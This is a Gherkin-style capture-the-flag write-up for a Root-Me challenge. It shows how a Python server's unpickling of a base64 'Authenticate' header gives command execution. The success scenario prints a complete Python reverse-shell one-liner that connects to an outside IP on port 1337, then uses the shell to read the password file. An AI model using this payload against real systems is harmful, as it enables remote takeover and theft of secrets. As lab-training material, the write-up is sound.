## Version 2.0
## language: en

Feature: rootme-app-script-python-pickle
  Site:
    https://www.root-me.org
  Category:
    app-script
  User:
    andrescl94
  Goal:
    Get a password from a remote HTTP server

  Background:
  Hacker's software:
  | <Software name>                | <Version>                 |
  | Ubuntu (Bionic)                | 18.04.1                   |
  | Firefox                        | 74.0 (64-bit)             |
  | Burp Suite Community Edition   | 2020.2.1                  |
  | AWS VM with Amazon Linux 2 AMI | 2.0.20200304.0 x86_64 HVM |
  | Netcat                         | 7.50                      |

  Machine information:
    Given the challenge URL
    """
    tcp://challenge02.root-me.org:60005
    """
    When I replace tcp for http in the url and use Firefox to open it
    Then I see a JSON response
    """
    {"result": "Not allowed you should first AUTH"}
    """
    And get the following information from the response headers
    """
    Server BaseHTTP/0.3 Python/2.7.17
    """

  Scenario: Fail: Command-Injection
    Given the JSON response
    And that the challenge states that I should log in as an admin
    Then I use Burp to capture the request
    And change the HTTP method to get the following request
    """
    AUTH admin HTTP/1.0
    """
    Then I get the following response
    """
    {"result": "Can't find 'Authenticate' header"}
    """
    When I include the previous header with a random value
    Then I get a traceback error
    And notice the following line in the traceback
    """
    pickle.loads(base64.b64decode(self.headers.getheader('Authenticate')))
    """
    When I investigate about the Pickle package
    Then I find out that a payload can be used to execute commands in the system
    And I try to execute the following command
    """
    cat /challenge/app-script/ch5/.passwd >&4
    """
    And I don't get the flag

  Scenario: Success: Command-Injection-Reverse-Shell
    Given the findings in the previous scenario
    And that the server is running Python
    And that I set up a VM in AWS using the AWS Management Console
    And the VM has a public IP 18.219.240.66
    And I execute netcat on that VM to listen on port 1337
    And I allow the security group to receive TCP traffic through that port
    When I use the pickle exploit to execute the following command
    """
    python -c 'import socket,subprocess,os;
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
    s.connect(("18.219.240.66",1337));
    os.dup2(s.fileno(),0);
    os.dup2(s.fileno(),1);
    os.dup2(s.fileno(),2);
    p=subprocess.call(["/bin/sh","-i"]);'
    """
    Then I get a reverse shell connection
    When I go to the folder /challenge/app-script/ch5/ in the target machine
    And use "cat" to read the file .passwd
    Then I get the flag
